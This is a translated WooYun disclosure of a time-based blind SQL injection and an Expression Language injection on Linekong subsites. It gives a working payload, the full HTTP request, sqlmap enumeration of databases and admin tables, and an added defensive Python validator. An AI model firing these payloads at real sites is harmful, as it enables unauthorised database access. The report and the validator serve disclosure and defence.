Vulnerability summary
Vulnerability title: SQL injection in a Linekong subsite
Submitted: 2015-07-13 12:06
Fix deadline: 2015-07-18 12:08
Disclosed: 2015-07-18 12:08
Vulnerability type: SQL injection
Severity: High
Self-assessed Rank: 20
Status: vendor notified, but the vendor ignored the vulnerability
Tags:
None
Vulnerability details / disclosure status:
2015-07-13: details sent to the vendor, awaiting vendor handling
2015-07-18: vendor actively ignored the vulnerability; details disclosed to the public
Brief description: time-based blind SQL injection in one Linekong subsite; a second subsite has Expression Language injection
Detailed description:
1. Vulnerable URL: http://yt.linekong.com/lottery/panda/vote_xml.php
POST /lottery/panda/vote_xml.php?timeStame=1436664476447n9198 HTTP/1.1
Content-Length: 150
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://yt.linekong.com/
Host: yt.linekong.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

voteOption=6139&vote_id=80
Parameter: vote_id is injectable
POST parameter 'vote_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 3692 HTTP(s) requests:
---
Place: POST
Parameter: vote_id
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: voteOption=6139&vote_id=80'||(SELECT 'xWhr' FROM DUAL WHERE 4985=4985 AND SLEEP(5) )||'
---
[14:30:05] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0.11

available databases [2]:
[*] `in`ormatiq\x0c_schemaA`
[*] yt_wgb

Database: yt_wgb
[22 tables]
+-------------------------+
| CPG_bridge              |
| DEPARTMENT              |
| Service                 |
| TBLTRANSACTIONS         |
| admin_login             |
| administer              |
| administration          |
| administrator           |
| agent                   |
| akhbar                  |
| apartments              |
| app_user                |
| banned_users            |
| binn_cform              |
| cell_line               |
| control                 |
| cv_countries            |
| dtb_bat_order_daily_age |
| ipblocks                |
| keyboards               |
| nuke_autonews           |
| spip_index_dico         |
+-------------------------+
Database: yt_wgb, Table: admin_login [60 columns]
Database: yt_wgb, Table: administrator [13 columns]
Database: yt_wgb, Table: app_user [50 columns]
2. http://kefu.linekong.com/eService/system/inputLogin.do?gameId=10&gameMainId=${100167-11126}
The gameMainId parameter is vulnerable to Expression Language injection, which can leak sensitive information. This was reported before but was not fully fixed; see: WooYun: Expression Language injection and remote command execution in a Linekong subsite
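As an added defensive example (not code from this report or from Linekong), the snippet below applies a strict integer allow-list to the id parameters named above and flags the time-based SQL injection and EL-expression probe patterns in request bodies, the kind of check a WAF rule or input validator on vote_xml.php and inputLogin.do would perform. The sample requests are constructed to mirror the two endpoints, and the set of integer parameters is an assumption.

```python
import re
from urllib.parse import parse_qs, unquote_plus

# Constructed sample requests modelled on the two endpoints in the report
# (not captured traffic): (path, body or query string)
SAMPLES = [
    ("/lottery/panda/vote_xml.php", "voteOption=6139&vote_id=80"),
    ("/lottery/panda/vote_xml.php",
     "voteOption=6139&vote_id=80'||(SELECT 'xWhr' FROM DUAL WHERE 4985=4985 AND SLEEP(5) )||'"),
    ("/eService/system/inputLogin.do", "gameId=10&gameMainId=${100167-11126}"),
    ("/eService/system/inputLogin.do", "gameId=10&gameMainId=100167"),
]

# Assumed: these parameters are numeric ids, so anything but digits is rejected
# before the value can reach a SQL string or an EL evaluator.
INT_PARAMS = {"vote_id", "voteOption", "gameId", "gameMainId"}

# Indicators of time-based SQLi probes and of EL/SpEL expression syntax.
TIME_SQLI = re.compile(r"\b(SLEEP|BENCHMARK|WAITFOR\s+DELAY|PG_SLEEP)\b", re.I)
EL_EXPR = re.compile(r"[$#]\{[^}]*\}")


def validate_params(raw):
    """Allow-list check of a body/query string; returns a list of violations."""
    problems = []
    for name, values in parse_qs(raw, keep_blank_values=True).items():
        for v in values:
            if name in INT_PARAMS and not re.fullmatch(r"\d{1,10}", v):
                problems.append(f"{name}: not an integer")
    return problems


def classify(raw):
    """Label a request for alerting: 'sqli-time', 'el-injection' or 'clean'."""
    decoded = unquote_plus(raw)  # normalise %xx and '+' before matching
    if TIME_SQLI.search(decoded):
        return "sqli-time"
    if EL_EXPR.search(decoded):
        return "el-injection"
    return "clean"


def scan(samples=SAMPLES):
    """Run both checks over the samples; returns (path, label, violations)."""
    return [(path, classify(q), validate_params(q)) for path, q in samples]


if __name__ == "__main__":
    for path, label, problems in scan():
        print(path, label, problems)
```

The allow-list check is the actual fix (a non-integer vote_id or gameMainId is rejected outright); the pattern matcher only provides detection for traffic that reaches an unpatched endpoint.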
Proof of vulnerability:
Fix recommendation:
Vulnerability response
Vendor response:
Severity: no impact, vendor ignored
Ignored at: 2015-07-18 12:08
Vendor reply:
Vulnerability Rank: 4 (WooYun rating)
Latest status: none yet
Vulnerability rating:
Comments
2015-07-30 19:50 |
乌云一朵朵 (Passerby | Rank: 0, vulnerabilities: 1 | Look at those dark clouds.)
@Ysql404 When sqlmap dumps data, the Chinese comes out garbled. How do I fix this? I already added #-*-coding:utf-8-*- on the second line of sqlmap.py, but it has no effect.
2015-07-31 10:00 |
Ysql404 (Intern white hat | Rank: 95, vulnerabilities: 16 | 。。。。。。。。。。。)